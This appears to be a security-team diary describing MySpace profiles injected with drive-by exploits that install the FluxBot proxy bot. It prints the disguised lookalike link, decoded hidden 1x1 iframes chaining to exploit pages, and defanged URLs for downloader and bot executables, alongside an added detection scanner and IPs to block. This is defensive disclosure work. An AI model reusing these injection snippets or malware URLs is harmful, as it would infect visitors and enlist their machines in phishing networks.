CAREFUL! This diary contains links to malicious code!
A number of MySpace profiles include drive-by exploits. The exploits install a version of "flux bot", a very popular proxy network bot.
FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex, ever-changing networks of proxy servers. A system infected with FluxBot will be used as one of these proxies.
Infected MySpace "Friend IDs": 39184135, 171598920, 22057010
A typical excerpt from an infected profile (obfuscated to protect the innocent):
<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusanbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>
The actual exploit / malware is served via an existing flux network. Note that the link above only looks like a MySpace URL: everything in front of "dusanbut.com" is just a string of subdomain labels, so the registered domain (and the site the browser actually contacts) is dusanbut.com. *.dusanbut.com will redirect the user to an encoded JavaScript block which decodes to:
<script>window.status="Done"</script>
<iframe src="http://fafb4c4c .com/header_03.gif" width=1
height=1></iframe>
The domain used here is, of course, again served via flux. header_03.gif is not an image; it decodes to:
<script>window.status="Done"</script>
<iframe src="http://fafb4c4c .com/routine.php" width=1
height=1></iframe>
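Two things in the excerpts above are easy to check for mechanically: a hostname that starts with a trusted name (myspace.com) but is registered under someone else's domain, and a 1x1 iframe pulling content from a third-party site. The following scanner is an added example and not part of the diary or of any MySpace tooling; the HTML it scans is constructed for the example, and the hostnames in it (attacker-placeholder.example, redirector-placeholder.example) are placeholders, not the real infrastructure described here. The registered-domain logic is deliberately simplified (last two labels; it ignores multi-label public suffixes such as co.uk).

```python
"""Scan profile HTML for lookalike-hostname links and hidden 1x1 iframes.

Added example, not code from the original diary.  SAMPLE_HTML below is
constructed to mirror the excerpts; its hostnames are placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains the profile is legitimately expected to load content from.
TRUSTED_DOMAINS = {"myspace.com"}


def registered_domain(host: str) -> str:
    """Return the last two labels of a hostname, i.e. the part the owner
    actually controls.  Simplified: does not understand public suffixes
    such as co.uk; use a public-suffix list in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def is_lookalike(host: str) -> bool:
    """True if a trusted domain appears as a label sequence inside the
    hostname but is not the registered domain, e.g.
    home.myspace.com.index.cfm.<...>.attacker-placeholder.example"""
    if registered_domain(host) in TRUSTED_DOMAINS:
        return False
    padded = "." + host.lower() + "."
    return any(("." + t + ".") in padded for t in TRUSTED_DOMAINS)


def _small(value: str) -> bool:
    """True for dimension attributes such as '1', '1px' or '0'."""
    digits = "".join(ch for ch in value if ch.isdigit())
    return digits != "" and int(digits) <= 2


class ProfileScanner(HTMLParser):
    """Collects (kind, hostname, registered_domain) findings."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a" and a.get("href"):
            host = urlsplit(a["href"]).hostname or ""
            if is_lookalike(host):
                self.findings.append(("lookalike-link", host, registered_domain(host)))
        elif tag == "iframe" and a.get("src"):
            host = urlsplit(a["src"]).hostname or ""
            tiny = _small(a.get("width", "")) and _small(a.get("height", ""))
            if tiny:
                self.findings.append(("hidden-iframe", host, registered_domain(host)))
            elif registered_domain(host) not in TRUSTED_DOMAINS:
                self.findings.append(("offsite-iframe", host, registered_domain(host)))


def scan(html: str) -> list:
    """Parse the HTML and return the list of findings."""
    scanner = ProfileScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample mirroring the profile excerpt and the decoded iframe.
SAMPLE_HTML = """
<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home.myspace.com.index.cfm.fuseaction.user.MyToken.xxxxxxxx.attacker-placeholder.example/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a>
<script>window.status="Done"</script>
<iframe src="http://redirector-placeholder.example/header_03.gif" width=1
height=1></iframe>
"""

if __name__ == "__main__":
    for kind, host, reg in scan(SAMPLE_HTML):
        print(f"{kind:15} registered domain: {reg:32} host: {host}")
```

On the sample the scanner reports one lookalike link (registered domain attacker-placeholder.example despite the myspace.com prefix) and one hidden iframe; the `<img>` pulled from x.myspace.com is ignored because its registered domain is trusted.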
Are we there yet? Yup. Just one more step: a (patched) Internet Explorer exploit, which installs the .exe. For example:
http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen, among others, these URLs:
http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe
Settings for the bot can be found here:
http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe
Once it is all said and done, you will be a proud new member of the flux net, and soon you will find your system participating in phishing and similar endeavours.
A couple of IPs that may be worthwhile to block:
AS13767 | 72.232.254.218
AS15083 | 65.111.176.176
AS25761 | 72.20.18.86
AS25761 | 72.20.6.10
As you can imagine, it's a lot of messy work to decode all of this. I am just the messenger; this is work done by members of our great handler team.